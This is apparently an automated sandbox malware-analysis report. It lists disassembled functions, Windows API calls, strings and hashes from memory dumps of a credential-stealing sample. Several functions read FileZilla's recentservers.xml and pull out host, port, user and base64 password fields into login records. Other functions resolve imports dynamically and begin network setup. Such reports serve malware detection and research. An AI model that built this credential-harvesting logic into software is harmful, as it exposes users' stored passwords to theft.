Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID:
API String ID: 123533781-0
Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50

Function 0081092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 0081095F
l, xrefs: 00810966
GetProcAddress., xrefs: 008109DC, 008109DF, 008109E4

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: a7102a0f231689fd65fa398c2c22b4531c2a6e7a60fdd3dc0dfb7c8f969c8fff
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: DD3118B6900619DFDB10CF99C880AEDBBF9FF48324F25414AD441E7211D7B1AA85CFA4

Function 0082D151 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 0082D156

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A

Function 0041CEEA Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A

Function 0089AC23 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2241173522.000000000089A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0089A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_89a000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: bc811601979a856c970f4a17f6b204d3b75d2b37fc8efd7ae1bf3e3416f8b81c
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 3F115272340104AFDB54EF59DC85EA673EAFB89324B298055ED04CF316D679EC41C7A1

Function 00810D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 3178929b01d798fa34d4ef378dbf52f0378e04f11d2b01edb067f4173028140d
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: CC01DF72A006048FDB21CF60DC04BEA33A9FF86306F1545A4D90AD7285E3B0A8C18F80

Function 008299B7 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 00419750 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 0082D1D3 Relevance: 107.7, APIs: 86, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

free.MSVCRT ref: 0082D1E7
free.MSVCRT ref: 0082D1EF
free.MSVCRT ref: 0082D1F7
free.MSVCRT ref: 0082D1FF
free.MSVCRT ref: 0082D207
free.MSVCRT ref: 0082D20F
free.MSVCRT ref: 0082D216
free.MSVCRT ref: 0082D21E
free.MSVCRT ref: 0082D226
free.MSVCRT ref: 0082D22E
free.MSVCRT ref: 0082D236
free.MSVCRT ref: 0082D23E
free.MSVCRT ref: 0082D246
free.MSVCRT ref: 0082D24E
free.MSVCRT ref: 0082D256
free.MSVCRT ref: 0082D25E
free.MSVCRT ref: 0082D269
free.MSVCRT ref: 0082D271
free.MSVCRT ref: 0082D279
free.MSVCRT ref: 0082D281
free.MSVCRT ref: 0082D289
free.MSVCRT ref: 0082D291
free.MSVCRT ref: 0082D299
free.MSVCRT ref: 0082D2A1
free.MSVCRT ref: 0082D2A9
free.MSVCRT ref: 0082D2B1
free.MSVCRT ref: 0082D2B9
free.MSVCRT ref: 0082D2C1
free.MSVCRT ref: 0082D2C9
free.MSVCRT ref: 0082D2D1
free.MSVCRT ref: 0082D2D9
free.MSVCRT ref: 0082D2E1
free.MSVCRT ref: 0082D2EF
free.MSVCRT ref: 0082D2FA
free.MSVCRT ref: 0082D305
free.MSVCRT ref: 0082D310
free.MSVCRT ref: 0082D31B
free.MSVCRT ref: 0082D326
free.MSVCRT ref: 0082D331
free.MSVCRT ref: 0082D33C
free.MSVCRT ref: 0082D347
free.MSVCRT ref: 0082D352
free.MSVCRT ref: 0082D35D
free.MSVCRT ref: 0082D368
free.MSVCRT ref: 0082D373
free.MSVCRT ref: 0082D37E
free.MSVCRT ref: 0082D389
free.MSVCRT ref: 0082D394
free.MSVCRT ref: 0082D3A2
free.MSVCRT ref: 0082D3AD
free.MSVCRT ref: 0082D3B8
free.MSVCRT ref: 0082D3C3
free.MSVCRT ref: 0082D3CE
free.MSVCRT ref: 0082D3D9
free.MSVCRT ref: 0082D3E4
free.MSVCRT ref: 0082D3EF
free.MSVCRT ref: 0082D3FA
free.MSVCRT ref: 0082D405
free.MSVCRT ref: 0082D410
free.MSVCRT ref: 0082D41B
free.MSVCRT ref: 0082D426
free.MSVCRT ref: 0082D431
free.MSVCRT ref: 0082D43C
free.MSVCRT ref: 0082D447
free.MSVCRT ref: 0082D455
free.MSVCRT ref: 0082D460
free.MSVCRT ref: 0082D46B
free.MSVCRT ref: 0082D476
free.MSVCRT ref: 0082D481
free.MSVCRT ref: 0082D48C
free.MSVCRT ref: 0082D497
free.MSVCRT ref: 0082D4A2
free.MSVCRT ref: 0082D4AD
free.MSVCRT ref: 0082D4B8
free.MSVCRT ref: 0082D4C3
free.MSVCRT ref: 0082D4CE
free.MSVCRT ref: 0082D4D9
free.MSVCRT ref: 0082D4E4
free.MSVCRT ref: 0082D4EF
free.MSVCRT ref: 0082D4FA
free.MSVCRT ref: 0082D508
free.MSVCRT ref: 0082D513
free.MSVCRT ref: 0082D51E
free.MSVCRT ref: 0082D529
free.MSVCRT ref: 0082D534
free.MSVCRT ref: 0082D53F

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
Instruction ID: 3f044f01c40b9ce0c563b07df49cd4f3cef513aa252351c6c72d6e4184116361
Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
Instruction Fuzzy Hash: 5171E531451B60DBD7E73B39FD03E497AA2FF04B02F104914B1D7A8D329A2268E59B53

Function 00410250 Relevance: 77.4, APIs: 32, Strings: 12, Instructions: 363stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A

Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52

strtok_s.MSVCRT ref: 0041031B
GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
lstrlenA.KERNEL32(00000000), ref: 00410393

Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903

StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
lstrlenA.KERNEL32(00000000), ref: 004103DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
lstrlenA.KERNEL32(00000000), ref: 00410427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
lstrlenA.KERNEL32(00000000), ref: 00410475
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
strtok_s.MSVCRT ref: 00410679
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
memset.MSVCRT ref: 004106DD

Strings

url: , xrefs: 00410577
<Host>, xrefs: 0041037C
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 004102A4
<Port>, xrefs: 004103C6
NA, xrefs: 004102CC, 004102F2, 004102CF, 004102F5
profile: null, xrefs: 00410568
<User>, xrefs: 00410410
password: , xrefs: 004105FB
<Pass encoding="base64">, xrefs: 0041045A
browser: FileZilla, xrefs: 00410559
NA, xrefs: 0041072E, 004106AF, 004106B2
login: , xrefs: 004105CA

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 337689325-514892060
Opcode ID: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
Opcode Fuzzy Hash: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69

Function 00814827 Relevance: 51.1, APIs: 34, Instructions: 114stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00424D98), ref: 00814833
lstrlen.KERNEL32(00424E48), ref: 0081483E
lstrlen.KERNEL32(00424F10), ref: 00814849
lstrlen.KERNEL32(00424FC8), ref: 00814854
lstrlen.KERNEL32(00425070), ref: 0081485F
GetProcessHeap.KERNEL32(00000000,?), ref: 0081486E
RtlAllocateHeap.NTDLL(00000000), ref: 00814875
lstrlen.KERNEL32(00425118), ref: 00814883
lstrlen.KERNEL32(004251C0), ref: 0081488E
lstrlen.KERNEL32(00425268), ref: 00814899
lstrlen.KERNEL32(00425310), ref: 008148A4
lstrlen.KERNEL32(004253B8), ref: 008148AF
lstrlen.KERNEL32(00425460), ref: 008148C3
lstrlen.KERNEL32(00425508), ref: 008148CE
lstrlen.KERNEL32(004255B0), ref: 008148D9
lstrlen.KERNEL32(00425658), ref: 008148E4
lstrlen.KERNEL32(00425700), ref: 008148EF
lstrlen.KERNEL32(004257A8), ref: 00814918
lstrlen.KERNEL32(00425850), ref: 00814923
lstrlen.KERNEL32(00425918), ref: 0081492E
lstrlen.KERNEL32(004259C0), ref: 00814939
lstrlen.KERNEL32(00425A68), ref: 00814944
strlen.MSVCRT ref: 00814957
lstrlen.KERNEL32(00425B10), ref: 0081497F
lstrlen.KERNEL32(00425BB8), ref: 0081498A
lstrlen.KERNEL32(00425C60), ref: 00814995
lstrlen.KERNEL32(00425D08), ref: 008149A0
lstrlen.KERNEL32(00425DB0), ref: 008149AB
lstrlen.KERNEL32(00425E58), ref: 008149BB
lstrlen.KERNEL32(00425F00), ref: 008149C6
lstrlen.KERNEL32(00425FA8), ref: 008149D1
lstrlen.KERNEL32(00426050), ref: 008149DC
lstrlen.KERNEL32(004260F8), ref: 008149E7
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00814A03

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID:
API String ID: 2127927946-0
Opcode ID: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
Instruction ID: ae4a6b251b2fc9c1804171e9360c36fc24acdcd8dec49b3696073522c61b6c8c
Opcode Fuzzy Hash: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
Instruction Fuzzy Hash: B441CA79740624EBC718AFE5EC8DB987F74AB4C712BA0C062F9029A190C7F5D5019B3E

Function 00829AC7 Relevance: 49.7, APIs: 33, Instructions: 212libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 00829B08
GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 00829B21
GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 00829B39
GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 00829B51
GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 00829B6A
GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 00829B82
GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 00829B9A
GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 00829BB3
GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 00829BCB
GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 00829BE3
GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 00829BFC
GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 00829C14
GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 00829C2C
GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 00829C45
GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 00829C5D
GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 00829C75
GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 00829C8E
GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 00829CA6
GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 00829CBE
GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 00829CD7
GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 00829CEF
LoadLibraryA.KERNEL32(0064A550,?,00826C67), ref: 00829D01
LoadLibraryA.KERNEL32(0064A17C,?,00826C67), ref: 00829D12
LoadLibraryA.KERNEL32(0064A104,?,00826C67), ref: 00829D24
LoadLibraryA.KERNEL32(0064A1DC,?,00826C67), ref: 00829D36
LoadLibraryA.KERNEL32(0064A328,?,00826C67), ref: 00829D47
GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 00829D69
GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 00829D8A
GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 00829DA2
GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 00829DC4
GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 00829DE5
GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 00829E06
GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 00829E1D

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
Instruction ID: 3cf3acc1044c41f3ebc8d841e18e7525f26bc8801e3f102bfb95a2ffcc739200
Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
Instruction Fuzzy Hash: 57A13BBD5C0240BFE364EFE8ED889A63BFBF74E301714661AE605C3264D6399841DB52

Function 008204B7 Relevance: 48.4, APIs: 32, Instructions: 363stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

Part of subcall function 00829047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00829072

Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79

Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D

Part of subcall function 00819C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00819C53
Part of subcall function 00819C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00819C78
Part of subcall function 00819C27: LocalAlloc.KERNEL32(00000040,?), ref: 00819C98
Part of subcall function 00819C27: ReadFile.KERNEL32(000000FF,?,00000000,008116F6,00000000), ref: 00819CC1
Part of subcall function 00819C27: LocalFree.KERNEL32(008116F6), ref: 00819CF7
Part of subcall function 00819C27: CloseHandle.KERNEL32(000000FF), ref: 00819D01

Part of subcall function 00829097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008290B9

strtok_s.MSVCRT ref: 00820582
GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 008205C9
RtlAllocateHeap.NTDLL(00000000), ref: 008205D0
StrStrA.SHLWAPI(00000000,00421618), ref: 008205EC
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 008205FA

Part of subcall function 00828B47: malloc.MSVCRT ref: 00828B4F
Part of subcall function 00828B47: strncpy.MSVCRT ref: 00828B6A

StrStrA.SHLWAPI(00000000,00421620), ref: 00820636
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00820644
StrStrA.SHLWAPI(00000000,00421628), ref: 00820680
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0082068E
StrStrA.SHLWAPI(00000000,00421630), ref: 008206CA
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 008206DC
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00820769
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00820781
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00820799
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 008207B1
lstrcat.KERNEL32(?,0042164C), ref: 008207C9
lstrcat.KERNEL32(?,00421660), ref: 008207D8
lstrcat.KERNEL32(?,00421670), ref: 008207E7
lstrcat.KERNEL32(?,00000000), ref: 008207FA
lstrcat.KERNEL32(?,00421678), ref: 00820809
lstrcat.KERNEL32(?,00000000), ref: 0082081C
lstrcat.KERNEL32(?,0042167C), ref: 0082082B
lstrcat.KERNEL32(?,00421680), ref: 0082083A
lstrcat.KERNEL32(?,00000000), ref: 0082084D
lstrcat.KERNEL32(?,00421688), ref: 0082085C
lstrcat.KERNEL32(?,0042168C), ref: 0082086B
lstrcat.KERNEL32(?,00000000), ref: 0082087E
lstrcat.KERNEL32(?,00421698), ref: 0082088D
lstrcat.KERNEL32(?,0042169C), ref: 0082089C
strtok_s.MSVCRT ref: 008208E0
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 008208F5
memset.MSVCRT ref: 00820944

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
String ID:
API String ID: 3689735781-0
Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
Instruction ID: eaa83064f14d28b77a0fecc24cce34f5aae4fd6bd59674e61f789261baa0a33f
Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
Instruction Fuzzy Hash: 5CD13175A40228EBCB08EBF4ED96EEE7779FF14700F504519F102E6091DE74AA85CB52

Function 00405960 Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 493networkstringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

